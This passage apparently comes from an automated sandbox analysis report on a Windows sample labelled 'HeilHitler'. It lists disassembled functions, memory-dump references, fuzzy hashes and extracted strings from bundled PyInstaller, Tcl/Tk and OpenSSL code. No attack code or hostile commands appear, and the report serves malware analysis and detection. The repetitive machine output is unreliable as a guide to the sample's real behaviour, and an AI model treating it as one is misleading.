                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033471768.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033554529.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633DA1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033670545.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: AddressErrorLastProc
                                                                                                                                                                                                                                            • String ID: Failed to get address for %hs$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_JoinThread$Tcl_MutexFinalize$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
                                                                                                                                                                                                                                            • API String ID: 199729137-3427451314
                                                                                                                                                                                                                                            • Opcode ID: 939c8a0ebf27c7f5789cd4a10996167767bc86255d761b2ba34a42bc6fc861e3
                                                                                                                                                                                                                                            • Instruction ID: d3a152d9022fc5cbed8f13374cf45911348c57e92719812608b5a812cbb71400
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 939c8a0ebf27c7f5789cd4a10996167767bc86255d761b2ba34a42bc6fc861e3
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AB02E525E0DB0B90FA459BE5A8129B433A1BF05754F942335E43EAA3A5FF3CB559B300
                                                                                                                                                                                                                                            Function 00007FFDFB0F3F10 Relevance: 58.0, APIs: 19, Strings: 14, Instructions: 223COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • 00007FFE1FFB5630.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFDFB0F4B53,?,?,?,?,?,?,?,?,00007FFDFB0F2B8B), ref: 00007FFDFB0F3F61
                                                                                                                                                                                                                                            • 00007FFE1FFB5630.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFDFB0F4B53,?,?,?,?,?,?,?,?,00007FFDFB0F2B8B), ref: 00007FFDFB0F3F78
                                                                                                                                                                                                                                            • 00007FFE1FFB5630.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFDFB0F4B53,?,?,?,?,?,?,?,?,00007FFDFB0F2B8B), ref: 00007FFDFB0F3F8F
                                                                                                                                                                                                                                            • 00007FFE1FFB5630.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFDFB0F4B53,?,?,?,?,?,?,?,?,00007FFDFB0F2B8B), ref: 00007FFDFB0F3FC2
                                                                                                                                                                                                                                            • 00007FFE1FFB5630.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFDFB0F4B53,?,?,?,?,?,?,?,?,00007FFDFB0F2B8B), ref: 00007FFDFB0F400B
                                                                                                                                                                                                                                            • 00007FFE1FFB5630.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFDFB0F4B53,?,?,?,?,?,?,?,?,00007FFDFB0F2B8B), ref: 00007FFDFB0F403F
                                                                                                                                                                                                                                            • 00007FFE1FFB5630.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFDFB0F4B53,?,?,?,?,?,?,?,?,00007FFDFB0F2B8B), ref: 00007FFDFB0F4091
                                                                                                                                                                                                                                            • 00007FFE1FFB5630.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFDFB0F4B53,?,?,?,?,?,?,?,?,00007FFDFB0F2B8B), ref: 00007FFDFB0F40A4
                                                                                                                                                                                                                                            • 00007FFE1FFB5630.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFDFB0F4B53,?,?,?,?,?,?,?,?,00007FFDFB0F2B8B), ref: 00007FFDFB0F40BB
                                                                                                                                                                                                                                            • 00007FFE1FFB5630.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFDFB0F4B53,?,?,?,?,?,?,?,?,00007FFDFB0F2B8B), ref: 00007FFDFB0F40CE
                                                                                                                                                                                                                                            • 00007FFE1FFB5630.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFDFB0F4B53,?,?,?,?,?,?,?,?,00007FFDFB0F2B8B), ref: 00007FFDFB0F40E5
                                                                                                                                                                                                                                            • 00007FFE1FFB5630.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFDFB0F4B53,?,?,?,?,?,?,?,?,00007FFDFB0F2B8B), ref: 00007FFDFB0F40F8
                                                                                                                                                                                                                                            • 00007FFE1FFB5630.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFDFB0F4B53,?,?,?,?,?,?,?,?,00007FFDFB0F2B8B), ref: 00007FFDFB0F410F
                                                                                                                                                                                                                                            • 00007FFE1FFB5630.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFDFB0F4B53,?,?,?,?,?,?,?,?,00007FFDFB0F2B8B), ref: 00007FFDFB0F4122
                                                                                                                                                                                                                                            • 00007FFE1FFB5630.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFDFB0F4B53,?,?,?,?,?,?,?,?,00007FFDFB0F2B8B), ref: 00007FFDFB0F4135
                                                                                                                                                                                                                                            • 00007FFE1FFB5630.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFDFB0F4B53,?,?,?,?,?,?,?,?,00007FFDFB0F2B8B), ref: 00007FFDFB0F4148
                                                                                                                                                                                                                                            • 00007FFE1FFB5630.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFDFB0F4B53,?,?,?,?,?,?,?,?,00007FFDFB0F2B8B), ref: 00007FFDFB0F415B
                                                                                                                                                                                                                                            • 00007FFE1FFB5630.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFDFB0F4B53,?,?,?,?,?,?,?,?,00007FFDFB0F2B8B), ref: 00007FFDFB0F41A7
                                                                                                                                                                                                                                            • 00007FFE1FFB5630.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFDFB0F4B53,?,?,?,?,?,?,?,?,00007FFDFB0F2B8B), ref: 00007FFDFB0F41D2
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2034614271.00007FFDFAFDD000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00007FFDFAF40000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034579485.00007FFDFAF40000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFAF41000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFAF4D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFAFA5000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFAFB9000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFAFC9000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB18C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB18E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB1B9000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB1EA000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB210000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB25E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB264000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB266000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB282000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB28F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2035725372.00007FFDFB293000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2035764384.00007FFDFB294000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdfaf40000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: 00007B5630
                                                                                                                                                                                                                                            • String ID: ANY PRIVATE KEY$CERTIFICATE$CERTIFICATE REQUEST$CMS$DH PARAMETERS$ENCRYPTED PRIVATE KEY$NEW CERTIFICATE REQUEST$PARAMETERS$PKCS #7 SIGNED DATA$PKCS7$PRIVATE KEY$TRUSTED CERTIFICATE$X509 CERTIFICATE$X9.42 DH PARAMETERS
                                                                                                                                                                                                                                            • API String ID: 2248877218-1119032718
                                                                                                                                                                                                                                            • Opcode ID: 53791607f956101f911f03bce5df1fcc48f1ca8588c3d50ca4fb3c9ab6ede07a
                                                                                                                                                                                                                                            • Instruction ID: 0cd435ad773a31ead966d429f455289d62cf2407f943bc57deb9caaae527a802
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 53791607f956101f911f03bce5df1fcc48f1ca8588c3d50ca4fb3c9ab6ede07a
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BC91AF12F0E68750FF509B259931A7C2A91EF577E8F485231DD3E862FDEE6CE4459200
                                                                                                                                                                                                                                            Function 00007FF633D681D0 Relevance: 24.6, APIs: 6, Strings: 8, Instructions: 117COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 00007FF633D69390: MultiByteToWideChar.KERNEL32(?,?,?,00007FF633D645F4,00000000,00007FF633D61985), ref: 00007FF633D693C9
                                                                                                                                                                                                                                            • ExpandEnvironmentStringsW.KERNEL32(?,00007FF633D686B7,?,?,00000000,00007FF633D63CBB), ref: 00007FF633D6822C
                                                                                                                                                                                                                                              • Part of subcall function 00007FF633D62810: MessageBoxW.USER32 ref: 00007FF633D628EA
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2033505327.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033471768.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033554529.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633DA1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033670545.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
                                                                                                                                                                                                                                            • String ID: %.*s$CreateDirectory$LOADER: failed to convert runtime-tmpdir to a wide string.$LOADER: failed to create runtime-tmpdir path %ls!$LOADER: failed to expand environment variables in the runtime-tmpdir.$LOADER: failed to obtain the absolute path of the runtime-tmpdir.$LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!$\
                                                                                                                                                                                                                                            • API String ID: 1662231829-930877121
                                                                                                                                                                                                                                            • Opcode ID: d247d3a0ca85f1815ed913d402e51827366718a31552b00c9fe28dde0a2555e6
                                                                                                                                                                                                                                            • Instruction ID: 16f7a4d3d11730a4688e763166bcd7f3f1033222b3c64f62f783ab04b24030c7
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d247d3a0ca85f1815ed913d402e51827366718a31552b00c9fe28dde0a2555e6
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A351B721A2C64281FA509BA5E8536BA7360AF94781F845631E61FE77D5FE3CF504A300
                                                                                                                                                                                                                                            Function 00007FF633D61600 Relevance: 22.9, APIs: 1, Strings: 12, Instructions: 145COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2033505327.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033471768.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033554529.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633DA1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033670545.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CurrentProcess
                                                                                                                                                                                                                                            • String ID: Failed to create symbolic link %s!$Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc
                                                                                                                                                                                                                                            • API String ID: 2050909247-1550345328
                                                                                                                                                                                                                                            • Opcode ID: b18de5488a40a73e5e49fb6efa9ef8e011055d3291ac3e73bf4f51ef931bf382
                                                                                                                                                                                                                                            • Instruction ID: a6bdfd9945747aa285e8d803024d7a6b3daf8c6c94dac3d1c141db40db657a2b
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b18de5488a40a73e5e49fb6efa9ef8e011055d3291ac3e73bf4f51ef931bf382
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3D51B061B0864392EA10ABE1A4131B973A0BF84794F844732EEACE77D6DF3CF555A740
                                                                                                                                                                                                                                            Function 00007FFDFAF44E3F Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 205registryfileCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2034614271.00007FFDFAF41000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00007FFDFAF40000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034579485.00007FFDFAF40000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFAF4D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFAFA5000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFAFB9000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFAFC9000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFAFDD000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB18C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB18E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB1B9000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB1EA000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB210000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB25E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB264000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB266000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB282000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB28F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2035725372.00007FFDFB293000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2035764384.00007FFDFB294000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdfaf40000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Event$FileSource$ByteCharDeregisterHandleMultiRegisterReportTypeWideWrite
                                                                                                                                                                                                                                            • String ID: $OpenSSL$OpenSSL: FATAL$no stack?
                                                                                                                                                                                                                                            • API String ID: 1270133462-2963566556
                                                                                                                                                                                                                                            • Opcode ID: 4334f370b7a482bd35c4ecd3ae7f0d910e81077902a64c89114c2b2096981407
                                                                                                                                                                                                                                            • Instruction ID: 193dcda3f3cbe0bb609548b7916e0d86befa95c521a37b6c29a5e933ef2cfb4d
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4334f370b7a482bd35c4ecd3ae7f0d910e81077902a64c89114c2b2096981407
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3291AE32B19B8385EB209F24D8609AD7760FF45B94F444336EA6D47AE9EF38E655C300
                                                                                                                                                                                                                                            Function 00007FFDFAE9DC60 Relevance: 21.1, APIs: 4, Strings: 8, Instructions: 98COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2034183596.00007FFDFAE81000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDFAE80000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034141796.00007FFDFAE80000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034183596.00007FFDFAEF3000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034183596.00007FFDFAEF6000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034183596.00007FFDFAF19000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034183596.00007FFDFAF24000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034183596.00007FFDFAF2E000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034512265.00007FFDFAF31000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034545589.00007FFDFAF33000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdfae80000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: 00007B6570
                                                                                                                                                                                                                                            • String ID: ..\s\ssl\ssl_ciph.c$ECDHE-ECDSA-AES128-GCM-SHA256$ECDHE-ECDSA-AES128-GCM-SHA256:ECDHE-ECDSA-AES256-GCM-SHA384$ECDHE-ECDSA-AES256-GCM-SHA384$SUITEB128$SUITEB128C2$SUITEB128ONLY$SUITEB192
                                                                                                                                                                                                                                            • API String ID: 4069847057-2661540032
                                                                                                                                                                                                                                            • Opcode ID: 4f80fd11e4851a1e8ac95db5fd60017dee8425b24d40a4da496b151f9a6555b3
                                                                                                                                                                                                                                            • Instruction ID: 009120b83a7da74720fd1634075c749d2e4c31671c7493386f4ab9bc839d28ee
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4f80fd11e4851a1e8ac95db5fd60017dee8425b24d40a4da496b151f9a6555b3
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 35418232B08B5296F71CAB24D8A0B7833A0FB88B54F044575DA6E877D8DF6DE550CB00
                                                                                                                                                                                                                                            Function 00007FFDFAE8247D Relevance: 19.4, APIs: 3, Strings: 8, Instructions: 141COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2034183596.00007FFDFAE81000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDFAE80000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034141796.00007FFDFAE80000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034183596.00007FFDFAEF3000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034183596.00007FFDFAEF6000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034183596.00007FFDFAF19000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034183596.00007FFDFAF24000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034183596.00007FFDFAF2E000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034512265.00007FFDFAF31000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034545589.00007FFDFAF33000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdfae80000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: 00007E13331210
                                                                                                                                                                                                                                            • String ID: ..\s\ssl\t1_enc.c$client finished$extended master secret$key expa$master s$n$nsio$server finished
                                                                                                                                                                                                                                            • API String ID: 1677897744-2209449699
                                                                                                                                                                                                                                            • Opcode ID: e36d4bbbe3f8c332e257ea66e05025d59355daf1d80406af26721cf5d49c00d7
                                                                                                                                                                                                                                            • Instruction ID: daeda7514ef97a0ed152a126a51ad2b698c4d7d95b23234dbaa4eb04bec8d26a
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e36d4bbbe3f8c332e257ea66e05025d59355daf1d80406af26721cf5d49c00d7
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A551E762B08B8281E724EF11E8507A9A7A0FB947C4F058175DE9E4779DDF3DD984C700
                                                                                                                                                                                                                                            Function 00007FFDFAF432AB Relevance: 19.4, APIs: 5, Strings: 6, Instructions: 127COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2034614271.00007FFDFAF41000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00007FFDFAF40000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034579485.00007FFDFAF40000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFAF4D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFAFA5000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFAFB9000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFAFC9000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFAFDD000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB18C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB18E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB1B9000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB1EA000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB210000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB25E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB264000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB266000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB282000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB28F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2035725372.00007FFDFB293000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2035764384.00007FFDFB294000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdfaf40000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: 00007$A1370$B5630
                                                                                                                                                                                                                                            • String ID: ..\s\crypto\ts\ts_conf.c$accuracy$microsecs$millisecs$p$secs
                                                                                                                                                                                                                                            • API String ID: 751195488-1596076588
                                                                                                                                                                                                                                            • Opcode ID: a354be8fb617e6a659b2ebe151350e266f0d4f90f2c91f9f87cda44e37b83124
                                                                                                                                                                                                                                            • Instruction ID: 9a04a9b73c28df43561c3a7e723ef5953f3c1ce0a87c788d6df1ffda617dfc4c
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a354be8fb617e6a659b2ebe151350e266f0d4f90f2c91f9f87cda44e37b83124
